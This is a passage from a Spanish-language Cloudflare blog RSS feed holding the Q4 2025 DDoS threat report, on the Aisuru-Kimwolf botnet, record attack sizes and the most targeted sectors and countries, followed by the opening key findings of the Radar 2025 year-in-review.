            <description><![CDATA[ El número de ataques DDoS se ha duplicado con creces en 2025. La capa de red está especialmente amenazada, ya que los ataques hipervolumétricos han crecido un 700 %. ]]></description>
            <content:encoded><![CDATA[ <p>Te damos la bienvenida a la 24.ª edición del informe trimestral sobre amenazas DDoS de Cloudflare. En este informe, <a href="https://www.cloudflare.com/cloudforce-one/"><u>Cloudforce One</u></a> ofrece un análisis exhaustivo de la evolución del panorama de amenazas de los <a href="https://www.cloudflare.com/learning/ddos/what-is-a-ddos-attack/"><u>ataques de denegación de servicio distribuido (DDoS)</u></a> basado en datos de la <a href="https://www.cloudflare.com/network/"><u>red de Cloudflare</u></a>. En esta edición, nos centramos en el cuarto trimestre de 2025 y compartimos los datos generales de 2025.</p><p>El cuarto trimestre de 2025 se ha caracterizado por un bombardeo sin precedentes lanzado por la <a href="https://www.cloudflare.com/learning/ddos/glossary/aisuru-kimwolf-botnet/"><u>botnet Aisuru-Kimwolf</u></a> (la campaña de ataques DDoS "The Night Before Christmas"). Esta campaña contra clientes de Cloudflare, así como contra el panel de control y la infraestructura de Cloudflare, incluyó ataques DDoS HTTP hipervolumétricos que superaron los 200 millones de solicitudes por segundo, apenas unas semanas después de un ataque sin precedentes de 31,4 terabits por segundo (Tb/s).</p>
    <div>
      <h2>Aspectos clave</h2>
      <a href="#aspectos-clave">
        
      </a>
    </div>
    <ol><li><p>Los ataques DDoS aumentaron un 121 % en 2025, alcanzando una media de 5376 ataques mitigados automáticamente cada hora.</p></li><li><p>En el último trimestre de 2025, Hong Kong escaló 12 posiciones, convirtiéndose en el segundo país del mundo que sufrió más ataques DDoS. El Reino Unido también subió 36 posiciones, lo que lo convierte en el 6.º país más afectado por los ataques.</p></li><li><p>Dispositivos Android TV infectados (como parte de la botnet Aisuru-Kimwolf) bombardearon la red de Cloudflare con ataques DDoS HTTP hipervolumétricos, y las empresas de telecomunicaciones fueron el sector más afectado.</p></li></ol>
    <div>
      <h2>En 2025 se produjo un gran aumento de los ataques DDoS</h2>
      <a href="#en-2025-se-produjo-un-gran-aumento-de-los-ataques-ddos">
        
      </a>
    </div>
    <p>En 2025, el número total de ataques DDoS se duplicó con creces, hasta la increíble cifra de 47,1 millones. Estos ataques han aumentado considerablemente en los últimos años: el número de ataques DDoS se ha disparado un 236 % entre 2023 y 2025.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7gWz9fvMGvTVL30YfnFL55/57749a329c2be23e45f87227221aa440/BLOG-3098_2.png" />
          </figure><p>En 2025, Cloudflare mitigó una media de 5376 ataques DDoS cada hora, de los cuales 3925 fueron ataques DDoS a la capa de red y 1451 fueron ataques DDoS HTTP. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6cANr8wDVOOMNIb9IPvPYb/56f75509048fcd68c188fdd87f68e883/.png" />
          </figure>
    <div>
      <h3>Los ataques DDoS a la capa de red se triplicaron con creces en 2025</h3>
      <a href="#los-ataques-ddos-a-la-capa-de-red-se-triplicaron-con-creces-en-2025">
        
      </a>
    </div>
    <p>El crecimiento más importante se produjo en los ataques DDoS a la capa de red, que se triplicaron ampliamente en términos interanuales. Cloudflare mitigó 34,4 millones de ataques DDoS a la capa de red en 2025, en comparación con los 11,4 millones en 2024.</p><p>Una parte sustancial de los ataques a la capa de red (aproximadamente 13,5 millones) se lanzaron directamente contra la infraestructura global de Internet protegida por <a href="https://www.cloudflare.com/en-gb/network-services/products/magic-transit/"><u>Cloudflare Magic Transit</u></a> y la infraestructura de Cloudflare, como parte de una campaña de ataques DDoS de 18 días de duración en el primer trimestre de 2025. De estos ataques, 6,9 millones se lanzaron contra clientes de Magic Transit, mientras que los otros 6,6 millones tenían como objetivo directo a Cloudflare. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6jomtSPOraOer8LPDxJ3Aw/603db470ecbde1362579624193807e43/BLOG-3098_4.png" />
          </figure><p>Este ataque fue una campaña de ataques DDoS multivectorial que incluyó, por ejemplo, <a href="https://www.cloudflare.com/learning/ddos/syn-flood-ddos-attack/"><u>ataques de inundación SYN</u></a>, <a href="https://www.cloudflare.com/learning/ddos/glossary/mirai-botnet/"><u>ataques DDoS generados por Mirai</u></a> y <a href="https://www.cloudflare.com/learning/ddos/ssdp-ddos-attack/"><u>ataques de amplificación SSDP</u></a>. Nuestros sistemas detectaron y mitigaron estos ataques de forma automática. De hecho, detectamos la campaña mientras preparábamos nuestro <a href="https://blog.cloudflare.com/ddos-threat-report-for-2025-q1/"><u>informe sobre las amenazas DDoS del primer trimestre de 2025</u></a>, ¡un buen ejemplo de la eficacia de la mitigación de DDoS de Cloudflare!</p><p>En el último trimestre de 2025, el número de ataques DDoS creció un 31 % respecto al trimestre anterior y un 58 % respecto a 2024. Los ataques DDoS a la capa de red impulsaron ese crecimiento. En el cuarto trimestre de 2025, los ataques DDoS a la capa de red representaron el 78 % de todos los ataques DDoS. La cantidad de ataques DDoS HTTP no ha cambiado, pero su tamaño ha aumentado a un ritmo que no habíamos visto desde la <a href="https://blog.cloudflare.com/technical-breakdown-http2-rapid-reset-ddos-attack/"><u>campaña de ataques DDoS HTTP/2 Rapid Reset</u></a> en 2023. Estas oleadas recientes han sido lanzadas por la <a href="https://www.cloudflare.com/learning/ddos/glossary/aisuru-kimwolf-botnet/"><u>botnet Aisuru-Kimwolf</u></a>, de la que hablaremos en la siguiente sección. </p>
    <div>
      <h3>Campaña de ataques DDoS "The Night Before Christmas"</h3>
      <a href="#campana-de-ataques-ddos-the-night-before-christmas">
        
      </a>
    </div>
    <p>El viernes 19 de diciembre de 2025, la <a href="https://www.cloudflare.com/learning/ddos/glossary/aisuru-kimwolf-botnet/"><u>botnet Aisuru-Kimwolf</u></a> comenzó a bombardear con ataques DDoS hipervolumétricos la infraestructura de Cloudflare y a clientes de Cloudflare. La novedad de esta campaña era su tamaño: la botnet utilizó ataques DDoS HTTP hipervolumétricos que superaron los 20 millones de solicitudes por segundo (Mrps).

</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6CMbEWh6TwRcld7gccwE81/dbe9877483861026d2fec6c0112ca8bb/BLOG-3098_5.png" />
          </figure><p>La botnet Aisuru-Kimwolf es un conjunto enorme de dispositivos infectados con <a href="https://www.cloudflare.com/learning/ddos/glossary/malware/"><u>malware</u></a>, principalmente dispositivos Android TV. Se estima que esta botnet está formada por entre 1 y 4 millones de hosts infectados. Es capaz de lanzar ataques DDoS que pueden paralizar la infraestructura crítica, bloquear la mayoría de las soluciones de protección contra DDoS heredadas basadas en la nube e incluso interrumpir la conectividad de países enteros.</p><p>Durante toda la campaña, los sistemas autónomos de protección contra DDoS de Cloudflare detectaron y mitigaron todos los ataques: 384 ataques que generaron gran cantidad de paquetes, 329 ataques que generaron gran cantidad de bits y 189 ataques que generaron gran cantidad de solicitudes, con un total de 902 ataques DDoS hipervolumétricos y un promedio de 53 ataques al día.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3GDQWNNnHac5Ovwm4z5Bug/052d194716063d069e4ccd2ff49e4228/BLOG-3098_6.png" />
          </figure><p>El tamaño medio de los ataques DDoS hipervolumétricos durante la campaña fue de 3000 millones de paquetes por segundo, 4 Tb/s y 54 millones de solicitudes por segundo. Las velocidades máximas registradas durante la campaña fueron de 9000 millones de paquetes por segundo, 24 Tb/s y 20 500 millones de solicitudes por segundo.</p><p>Para ponerlo en contexto, la escala de un ataque DDoS de 205 000 millones de solicitudes por segundo sería equivalente a que las poblaciones combinadas del Reino Unido, Alemania y España escribieran simultáneamente la dirección de un mismo sitio web y luego pulsaran Intro en el mismo segundo.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7N0ruuQdsq6ncG7sQOMvv2/eb092b6380378031003760697d123f9d/BLOG-3098_7.png" />
          </figure><p>La campaña "The Night Before Christmas", aunque tuvo un gran impacto, representó solo una pequeña parte de los ataques DDoS hipervolumétricos que observamos durante el año.</p>
    <div>
      <h3>Ataques DDoS HTTP hipervolumétricos</h3>
      <a href="#ataques-ddos-http-hipervolumetricos">
        
      </a>
    </div>
    <p>A lo largo de 2025, Cloudflare observó un aumento continuo en los ataques DDoS hipervolumétricos. En el cuarto trimestre de 2025, los ataques hipervolumétricos aumentaron un 40 % en comparación con el trimestre anterior.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3ZZAyBKHY8TST9or2kXc7b/a5927b87b686c50aa7137847cd204b74/BLOG-3098_8.png" />
          </figure><p>A medida que el número de ataques aumentaba en el transcurso de 2025, el tamaño de los ataques también aumentaba, con un crecimiento de más del 700 %, uno de los cuales alcanzó 31,4 Tb/s en un ataque DDoS que duró apenas 35 segundos. El siguiente gráfico muestra el rápido crecimiento del tamaño de los ataques DDoS observados y bloqueados por Cloudflare. Cada uno de estos ataques ha supuesto un récord mundial, es decir, ha sido el mayor ataque jamás divulgado públicamente por una empresa hasta ese momento.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5fqqJ2VBvAlhnv0vIpoGZF/bd260c5a7ab673b35865e94b9e86a6d7/BLOG-3098_9.png" />
          </figure><p>Como todos los demás ataques, el ataque DDoS de 31,4 Tb/s fue detectado y mitigado automáticamente por la solución de protección contra DDoS autónoma de Cloudflare, que fue capaz de adaptarse y bloquear rápidamente botnets como Aisuru-Kimwolf.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3piM1qb6UGpxBXExV0adHn/8f1cfbb2841dce9d6b462fb71704bca2/BLOG-3098_10.png" />
          </figure><p>La mayoría de los ataques DDoS hipervolumétricos tenían como objetivo clientes de Cloudflare del sector de las telecomunicaciones y los proveedores y operadores de servicios. Los clientes de Cloudflare del sector de los videojuegos y los clientes que prestan servicios de IA generativa también sufrieron ataques. Por último, la propia infraestructura de Cloudflare fue objetivo de varios vectores de ataque, como <a href="https://www.cloudflare.com/learning/ddos/http-flood-ddos-attack/"><u>inundaciones HTTP</u></a>, <a href="https://www.cloudflare.com/learning/ddos/dns-amplification-ddos-attack/"><u>ataques DNS</u></a> e <a href="https://www.cloudflare.com/learning/ddos/udp-flood-ddos-attack/"><u>inundaciones UDP</u></a>.</p>
    <div>
      <h3>Sectores más afectados</h3>
      <a href="#sectores-mas-afectados">
        
      </a>
    </div>
    <p>Al analizar los ataques DDoS de todos los tamaños, el sector de las telecomunicaciones y los proveedores y operadores de servicios también fue el más afectado. Anteriormente, el sector de los servicios y la tecnología de la información era el que ostentaba ese desafortunado título.</p><p>El sector de las apuestas y casinos y el de los videojuegos ocuparon el tercer y cuarto lugar, respectivamente. Las mayores variaciones del trimestre en las principales 10 posiciones se han producido en los sectores del software informático y de los servicios empresariales, que han escalado varias posiciones. </p><p>Los sectores más afectados se caracterizan por su función como una infraestructura crítica, como una red troncal central para otras empresas, o por las repercusiones financieras inmediatas y de alto riesgo que tendrían en caso de interrupciones del servicio y latencia.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2zmtrvUq0cXCEKlprLopWg/80e622f255fa6466f5facfa1288d571b/image8.png" />
          </figure>
    <div>
      <h3>Países más afectados por los ataques</h3>
      <a href="#paises-mas-afectados-por-los-ataques">
        
      </a>
    </div>
    <p>El panorama de los ataques DDoS experimentó tanto una estabilidad predecible como cambios drásticos en los países más afectados por los ataques en todo el mundo. China, Alemania, Brasil y Estados Unidos fueron los cinco principales objetivos, lo que demuestra el reiterado interés que tienen estos países para los atacantes. </p><p>Hong Kong ha tenido un cambio significativo, subiendo doce posiciones hasta la segunda posición. Sin embargo, el dato más destacado ha sido el meteórico ascenso del Reino Unido, que este trimestre ascendió 36 posiciones, por lo que pasa a ser el 6.º país más afectado por los ataques.  </p><p>Vietnam mantiene la séptima posición en la lista de países más afectados por los ataques, seguido de Azerbaiyán, la India y Singapur (en octava, novena y décima posición, respectivamente).</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1fbfabacHT9WNKaZLhShlP/465f20da2e2f728692d5c22fc788a0a3/image10.png" />
          </figure>
    <div>
      <h3>Principales orígenes de los ataques</h3>
      <a href="#principales-origenes-de-los-ataques">
        
      </a>
    </div>
    <p>Bangladés ha desbancado a Indonesia como el país donde se originaron más ataques DDoS en el cuarto trimestre de 2025. Indonesia ha bajado al tercer puesto, tras ser durante un año el principal país de origen de ataques DDoS. Ecuador también ha escalado dos posiciones y ahora en el segundo país de origen de ataques DDoS.</p><p>En concreto, Argentina ha escalado veinte sorprendentes posiciones, y ahora es el cuarto mayor país de origen de ataques DDoS. Hong Kong ha subido tres puestos y ha ocupado el quinto lugar. Ucrania ocupa el sexto lugar, seguida de Vietnam, Taiwán, Singapur y Perú.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/67THFzBjHYivQwttU61U9a/f8f5fe3afcca9495cb7d5fb7f61220fa/image5.png" />
          </figure>
    <div>
      <h2>Principales redes de origen</h2>
      <a href="#principales-redes-de-origen">
        
      </a>
    </div>
    <p>La lista de las 10 principales redes donde se originan los ataques parece una lista de gigantes de Internet, y revela una historia fascinante sobre la anatomía de los ataques DDoS modernos. El hilo conductor está claro: los ciberdelincuentes aprovechan la infraestructura de red más accesible y potente del mundo, principalmente grandes servicios accesibles desde Internet. </p><p>Vemos que la mayoría de los ataques DDoS proceden de direcciones IP asociadas a plataformas de informática en la nube y a proveedores de infraestructura en la nube, como<a href="https://radar.cloudflare.com/as14061"> <u>DigitalOcean (AS 14061)</u></a>,<a href="https://radar.cloudflare.com/as8075"> <u>Microsoft (AS 8075)</u></a>,<a href="https://radar.cloudflare.com/as132203"> <u>Tencent (AS 132203)</u></a>, <a href="https://radar.cloudflare.com/as31898"><u>Oracle (AS 31898)</u></a> y<a href="https://radar.cloudflare.com/as24940"> <u>Hetzner (AS 24940)</u></a>. Esto demuestra el fuerte vínculo entre las máquinas virtuales, de fácil suministro, y los ataques de gran volumen. A estos orígenes en la nube (muy concentrados en Estados Unidos) les sigue de cerca una presencia significativa de ataques procedentes de direcciones IP asociadas a proveedores de telecomunicaciones tradicionales. Estas empresas de telecomunicaciones, principalmente de la región de Asia-Pacífico (como Vietnam, China, Malasia y Taiwán), completan las restantes 10 principales posiciones.</p><p>Esta diversidad geográfica y organizativa confirma una realidad bidimensional de los ataques: si bien la gran escala de los orígenes que ocupan las primeras posiciones de la clasificación se suele originar en centros globales en la nube, el problema tiene realmente un alcance mundial y se enruta a través de las vías más críticas de Internet desde todo el mundo. En muchos ataques DDoS, vemos miles de ASN de origen distintos, lo que pone de manifiesto la distribución verdaderamente global de los nodos de la botnet.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7ga5hHIgrc1pTwosbpx9di/458a87c028e8d51e10c7c56b416d3b64/BLOG-3098_14.png" />
          </figure><p>Para ayudar a los proveedores de alojamiento, a las plataformas de informática en la nube y a los proveedores de servicios de Internet a identificar y eliminar las direcciones IP/cuentas abusivas que lanzan estos ataques, aprovechamos la perspectiva exclusiva que tiene Cloudflare de los ataques DDoS para proporcionar un <a href="https://developers.cloudflare.com/ddos-protection/botnet-threat-feed/"><u>canal gratuito sobre amenazas de botnets DDoS para proveedores de servicios</u></a>. </p><p>Más de 800 redes de todo el mundo ya se han registrado en este canal, y hemos observado una gran colaboración en toda la comunidad para desmantelar los nodos de botnets.</p>
    <div>
      <h3>Ayudamos a proteger Internet</h3>
      <a href="#ayudamos-a-proteger-internet">
        
      </a>
    </div>
    <p>Los ataques DDoS están aumentando rápidamente en sofisticación y tamaño, superando cifras que antes eran imaginables. En este panorama de las amenazas en constante evolución, muchas organizaciones tienen dificultades para adaptarse. Las organizaciones que actualmente dependen de dispositivos de mitigación locales o de centros de filtrado bajo demanda pueden verse beneficiadas si reevalúan su estrategia de defensa.</p><p>Cloudflare se dedica a ofrecer<a href="https://www.cloudflare.com/ddos/"> <u>protección contra DDoS gratuita e ilimitada</u></a> a todos sus clientes, independientemente del tamaño, la duración o el volumen de los ataques, aprovechando su<a href="https://www.cloudflare.com/network/"> <u>vasta red global</u></a> y sus<a href="https://developers.cloudflare.com/ddos-protection/about/"> <u>sistemas autónomos de mitigación de DDoS</u></a>.</p>
    <div>
      <h3>Acerca de Cloudforce One</h3>
      <a href="#acerca-de-cloudforce-one">
        
      </a>
    </div>
    <p>Movidos por la misión de ayudar a proteger Internet, <a href="https://www.cloudflare.com/cloudforce-one/"><u>Cloudforce One</u></a> aprovecha la telemetría de la red global de Cloudflare, que protege aproximadamente el 20 % de la web, para impulsar la investigación de amenazas y la respuesta operativa, protegiendo los sistemas críticos de millones de organizaciones en todo el mundo.</p> ]]></content:encoded>
            <category><![CDATA[Informes DDoS]]></category>
            <category><![CDATA[DDoS]]></category>
            <category><![CDATA[Cloudforce One]]></category>
            <category><![CDATA[Seguridad]]></category>
            <category><![CDATA[Advanced DDoS (ES)]]></category>
            <category><![CDATA[AI]]></category>
            <guid isPermaLink="false">4RtH1xA4p0tuaD6gFL46Pf</guid>
            <dc:creator>Omer Yoachimik</dc:creator>
            <dc:creator>Jorge Pacheco</dc:creator>
            <dc:creator>Cloudforce One</dc:creator>
        </item>
        <item>
            <title><![CDATA[Resumen del año 2025 de Cloudflare Radar | El auge de la IA, la era poscuántica y los ataques DDoS sin precedentes]]></title>
            <link>https://blog.cloudflare.com/es-es/radar-2025-year-in-review/</link>
            <pubDate>Mon, 15 Dec 2025 14:00:00 GMT</pubDate>
            <description><![CDATA[ Aquí tienes la sexta revisión anual de las tendencias y patrones de Internet observados en todo el mundo, donde se muestran las interrupciones, los avances y las métricas que han marcado el año 2025.  ]]></description>
            <content:encoded><![CDATA[ <p>Ya está disponible el <a href="https://radar.cloudflare.com/year-in-review/2025/"><u>Resumen del año 2025</u></a>, nuestro sexto informe de Cloudflare Radar, que analiza las tendencias y los patrones de Internet que hemos observado a lo largo de este año, basado en la amplia visión de la red de Cloudflare.</p><p>Nuestra perspectiva es única, gracias a la <a href="https://cloudflare.com/network"><u>red</u></a> global de Cloudflare, que está presente en 330 ciudades de más de 125 países / regiones. Gestionamos una media de más de 81 millones de solicitudes HTTP por segundo, y más de 129 millones de solicitudes HTTP por segundo en los momentos de mayor actividad, en nombre de millones de propiedades web de clientes. Además, respondemos a aproximadamente 67 millones de consultas DNS (autoritativas + de resolución) por segundo. <a href="https://radar.cloudflare.com/"><u>Cloudflare Radar</u></a> utiliza los datos generados por estos servicios web y DNS, combinados con otros conjuntos de datos complementarios, para proporcionar información casi en tiempo real sobre los patrones y las tendencias relativas al <a href="https://radar.cloudflare.com/traffic"><u>tráfico</u></a>, los <a href="https://radar.cloudflare.com/bots"><u>bots</u></a>, la <a href="https://radar.cloudflare.com/security/"><u>seguridad</u></a>, la <a href="https://radar.cloudflare.com/quality"><u>conectividad</u></a> y los <a href="https://radar.cloudflare.com/dns"><u>DNS</u></a> que observamos en Internet.</p><p>Nuestro <a href="https://radar.cloudflare.com/year-in-review/2025/"><u>Resumen del año en Radar</u></a> aprovecha esta observabilidad para ofrecer una retrospectiva del año 2025 en lugar de una visión en tiempo real. Incorpora gráficos, tablas y mapas interactivos que te permitirán explorar y comparar tendencias y métricas seleccionadas año tras año y en todas las geografías, así como compartir e integrar gráficos del resumen del año. </p><p>El informe está organizado en seis secciones: <a href="https://radar.cloudflare.com/year-in-review/2025#internet-traffic-growth"><u>Tráfico</u></a>, <a href="https://radar.cloudflare.com/year-in-review/2025#robots-txt"><u>IA</u></a>, <a href="https://radar.cloudflare.com/year-in-review/2025#ios-vs-android"><u>Adopción y uso</u></a>, <a href="https://radar.cloudflare.com/year-in-review/2025#internet-outages"><u>Conectividad</u></a>, <a href="https://radar.cloudflare.com/year-in-review/2025#mitigated-traffic"><u>Seguridad</u></a> y <a href="https://radar.cloudflare.com/year-in-review/2025#malicious-emails"><u>Seguridad del correo electrónico</u></a>, con datos que abarcan el periodo comprendido entre el 1 de enero y el 2 de diciembre de 2025. Para garantizar la coherencia, hemos mantenido las metodologías subyacentes sin cambios respecto a los cálculos de años anteriores. Este año también hemos incorporado varios conjuntos de datos nuevos, entre los que se incluyen múltiples métricas relacionadas con la IA, la <a href="https://radar.cloudflare.com/year-in-review/2025#speed-tests"><u>actividad global de pruebas de velocidad</u></a> y la <a href="https://radar.cloudflare.com/year-in-review/2025#ddos-attacks"><u>progresión del tamaño hipervolumétrico de los ataques DDoS</u></a>. En el micrositio se pueden consultar las tendencias de más de 200 países / regiones. Se excluyen las localidades más pequeñas o menos pobladas debido a la insuficiencia de datos. Algunas métricas solo se muestran a nivel global, y no se muestran si se selecciona un país o región. </p><p>En esta publicación, destacamos conclusiones clave y observaciones interesantes de las principales secciones del micrositio "Resumen del año" y hemos vuelto a publicar una entrada complementaria en el <i>blog</i> "<a href="https://blog.cloudflare.com/radar-2025-year-in-review-internet-services/"><u>Servicios de Internet más populares</u></a>" que analiza específicamente las tendencias observadas en los <a href="https://radar.cloudflare.com/year-in-review/2025#internet-services"><u>principales servicios de Internet</u></a>.</p><p>Te animamos a visitar el micrositio <a href="https://radar.cloudflare.com/year-in-review/2025/"><u>Resumen del año 2025</u></a> para explorar los conjuntos de datos y las métricas con más detalle, incluidos los de tu país / región, para ver cómo han cambiado desde 2024 y cómo se comparan con otras áreas de interés. </p><p>Esperamos que el informe te resulte una herramienta útil y enriquecedora para descubrir los cambios, los avances y las métricas que han definido Internet en 2025. </p><p>Empecemos.</p>
    <div>
      <h2>Conclusiones principales</h2>
      <a href="#conclusiones-principales">
        
      </a>
    </div>
    
    <div>
      <h3>Tráfico</h3>
      <a href="#trafico">
        
      </a>
    </div>
    <ul><li><p>El tráfico global de Internet creció un 19 % en 2025, y el crecimiento más significativo se produjo a partir de agosto. <a href="#global-internet-traffic-grew-19-in-2025-with-significant-growth-starting-in-august"><u>➜</u></a></p></li><li><p>Los 10 servicios de Internet más populares experimentaron algunos cambios con respecto al año anterior, y hubo nuevas incorporaciones a algunas listas de categorías. <a href="#the-top-10-most-popular-internet-services-saw-some-year-over-year-shifts-while-the-category-lists-saw-a-number-of-new-entrants"><u>➜</u></a></p></li><li><p>El tráfico de Starlink se duplicó en 2025, incluido el tráfico de más de 20 países / regiones nuevos. <a href="#starlink-traffic-doubled-in-2025-including-traffic-from-over-20-new-countries-regions"><u>➜</u></a></p></li><li><p>Googlebot volvió a ser responsable del mayor volumen de tráfico de solicitudes a Cloudflare en 2025, ya que rastreó millones de sitios de clientes de Cloudflare para la indexación de búsquedas y el entrenamiento de la IA. <a href="#googlebot-was-again-responsible-for-the-highest-volume-of-request-traffic-to-cloudflare-in-2025-as-it-crawled-millions-of-cloudflare-customer-sites-for-search-indexing-and-ai-training"><u>➜</u></a></p></li><li><p>La proporción del tráfico web generado por humanos que está cifrado con tecnología poscuántica ha aumentado hasta el 52 %. <a href="#the-share-of-human-generated-web-traffic-that-is-post-quantum-encrypted-has-grown-to-52"><u>➜</u></a></p></li><li><p>Googlebot fue responsable de más de una cuarta parte del tráfico de bots verificados. <a href="#googlebot-was-responsible-for-more-than-a-quarter-of-verified-bot-traffic"><u>➜</u></a></p></li></ul>
    <div>
      <h3>IA</h3>
      <a href="#ia">
        
      </a>
    </div>
    <ul><li><p>El volumen de rastreo del Googlebot de doble función eclipsó al de otros bots y rastreadores de IA. <a href="#crawl-volume-from-dual-purpose-googlebot-dwarfed-other-ai-bots-and-crawlers"><u>➜</u></a></p></li><li><p>El rastreo de "acciones de usuarios" por parte de la IA se multiplicó por más de 15 en 2025. <a href="#ai-user-action-crawling-increased-by-over-15x-in-2025"><u>➜</u></a></p></li><li><p>Mientras que otros bots de IA representaron el 4,2 % del tráfico de solicitudes HTML, Googlebot por sí solo representó el 4,5 %. <a href="#while-other-ai-bots-accounted-for-4-2-of-html-request-traffic-googlebot-alone-accounted-for-4-5"><u>➜</u></a></p></li><li><p>Anthropic tuvo la proporción más alta de rastreo-referencia entre las principales plataformas de IA y búsqueda. <a href="#anthropic-had-the-highest-crawl-to-refer-ratio-among-the-leading-ai-and-search-platforms"><u>➜</u></a></p></li><li><p>Los rastreadores de IA fueron los agentes de usuario a los que se les denegó totalmente el acceso con más frecuencia en los archivos robots.txt. <a href="#ai-crawlers-were-the-most-frequently-fully-disallowed-user-agents-found-in-robots-txt-files"><u>➜</u></a></p></li><li><p>En Workers AI, el modelo llama-3-8b-instruct de Meta fue el más popular, y la generación de texto fue el tipo de tarea más frecuente. <a href="#on-workers-ai-metas-llama-3-8b-instruct-model-was-the-most-popular-model-and-text-generation-was-the-most-popular-task-type"><u>➜</u></a></p></li></ul>
    <div>
      <h3>Adopción y uso</h3>
      <a href="#adopcion-y-uso">
        
      </a>
    </div>
    <ul><li><p>Los dispositivos iOS generaron el 35 % del tráfico de dispositivos móviles a nivel mundial y más de la mitad del tráfico de dispositivos en muchos países. <a href="#ios-devices-generated-35-of-mobile-device-traffic-globally-and-more-than-half-of-device-traffic-in-many-countries"><u>➜</u></a></p></li><li><p>El porcentaje de las solicitudes web globales que utilizan HTTP/3 y HTTP/2 aumentó ligeramente en 2025. <a href="#the-shares-of-global-web-requests-using-http-3-and-http-2-both-increased-slightly-in-2025"><u>➜</u></a></p></li><li><p>Las bibliotecas y los marcos basados en JavaScript siguieron siendo herramientas fundamentales para la creación de sitios web. <a href="#javascript-based-libraries-and-frameworks-remained-integral-tools-for-building-web-sites"><u>➜</u></a></p></li><li><p>Una quinta parte de las solicitudes de API automatizadas fueron realizadas por clientes de Go. <a href="#one-fifth-of-automated-api-requests-were-made-by-go-based-clients"><u>➜</u></a></p></li><li><p>Google sigue siendo el motor de búsqueda líder, seguido de lejos por Yandex, Bing y DuckDuckGo. <a href="#google-remains-the-top-search-engine-with-yandex-bing-and-duckduckgo-distant-followers"><u>➜</u></a></p></li><li><p>Chrome sigue siendo el navegador principal en todas las plataformas y sistemas operativos, excepto en iOS, donde Safari tiene la mayor cuota. <a href="#chrome-remains-the-top-browser-across-platforms-and-operating-systems-except-on-ios-where-safari-has-the-largest-share"><u>➜</u></a></p></li></ul>
    <div>
      <h3>Conectividad</h3>
      <a href="#conectividad">
        
      </a>
    </div>
    <ul><li><p>Casi la mitad de las 174 interrupciones importantes de Internet observadas en todo el mundo en 2025 se debieron a cortes regionales y nacionales de la conectividad a Internet impuestos por los gobiernos. <a href="#almost-half-of-the-174-major-internet-outages-observed-around-the-world-in-2025-were-due-to-government-directed-regional-and-national-shutdowns-of-internet-connectivity"><u>➜</u></a></p></li><li><p>A nivel mundial, menos de un tercio de las solicitudes de doble pila se realizaron a través de IPv6, mientras que en la India, más de dos tercios lo hicieron. <a href="#globally-less-than-a-third-of-dual-stack-requests-were-made-over-ipv6-while-in-india-over-two-thirds-were"><u>➜</u></a></p></li><li><p>Los países europeos registraron algunas de las velocidades de descarga más altas, todas superiores a 200 MB/s. España estuvo sistemáticamente entre los primeros en cuanto a métricas de calidad de Internet. <a href="#european-countries-had-some-of-the-highest-download-speeds-all-above-200-mbps-spain-remained-consistently-among-the-top-locations-across-measured-internet-quality-metrics"><u>➜</u></a></p></li><li><p>Londres y Los Ángeles fueron los puntos más activos en las pruebas de velocidad de Cloudflare en 2025. <a href="#london-and-los-angeles-were-hotspots-for-cloudflare-speed-test-activity-in-2025"><u>➜</u></a></p></li><li><p>Más de la mitad del tráfico de solicitudes procede de dispositivos móviles en 117 países / regiones. <a href="#more-than-half-of-request-traffic-comes-from-mobile-devices-in-117-countries-regions"><u>➜</u></a></p></li></ul>
    <div>
      <h3>Seguridad</h3>
      <a href="#seguridad">
        
      </a>
    </div>
    <ul><li><p>El 6 % del tráfico global a través de la red de Cloudflare fue mitigado por nuestros sistemas, ya sea como potencialmente malicioso o por razones definidas por el cliente. <a href="#6-of-global-traffic-over-cloudflares-network-was-mitigated-by-our-systems-either-as-potentially-malicious-or-for-customer-defined-reasons"><u>➜</u></a></p></li><li><p>El 40 % del tráfico global de bots procedió de Estados Unidos. Amazon Web Services y Google Cloud generaron una cuarta parte del tráfico global de bots. <a href="#40-of-global-bot-traffic-came-from-the-united-states-with-amazon-web-services-and-google-cloud-originating-a-quarter-of-global-bot-traffic"><u>➜</u></a></p></li><li><p>Las organizaciones del sector "Personas y sociedad" fueron las más afectadas durante 2025. <a href="#organizations-in-the-people-and-society-vertical-were-the-most-targeted-during-2025"><u>➜</u></a></p></li><li><p>La seguridad del enrutamiento, medida como la proporción de rutas válidas RPKI y el espacio de direcciones IP cubierto, experimentó una mejora continua a lo largo de 2025. <a href="#routing-security-measured-as-the-shares-of-rpki-valid-routes-and-covered-ip-address-space-saw-continued-improvement-throughout-2025"><u>➜</u></a></p></li><li><p>El tamaño de los ataques DDoS hipervolumétricos aumentó significativamente a lo largo del año. <a href="#hyper-volumetric-ddos-attack-sizes-grew-significantly-throughout-the-year"><u>➜</u></a></p></li><li><p>Más del 5 % de los mensajes de correo electrónico analizados por Cloudflare resultaron ser maliciosos. <a href="#more-than-5-of-email-messages-analyzed-by-cloudflare-were-found-to-be-malicious"><u>➜</u></a></p></li><li><p>Los enlaces engañosos, el robo de identidad y la suplantación de marcas fueron los tipos de amenazas más comunes encontrados en los mensajes de correo electrónico maliciosos. <a href="#deceptive-links-identity-deception-and-brand-impersonation-were-the-most-common-types-of-threats-found-in-malicious-email-messages"><u>➜</u></a></p></li><li><p>Casi todos los mensajes de correo electrónico procedentes de los dominios de nivel superior .christmas y .lol resultaron ser spam o maliciosos. <a href="#nearly-all-of-the-email-messages-from-the-christmas-and-lol-top-level-domains-were-found-to-be-either-spam-or-malicious"><u>➜</u></a></p></li></ul>
    <div>
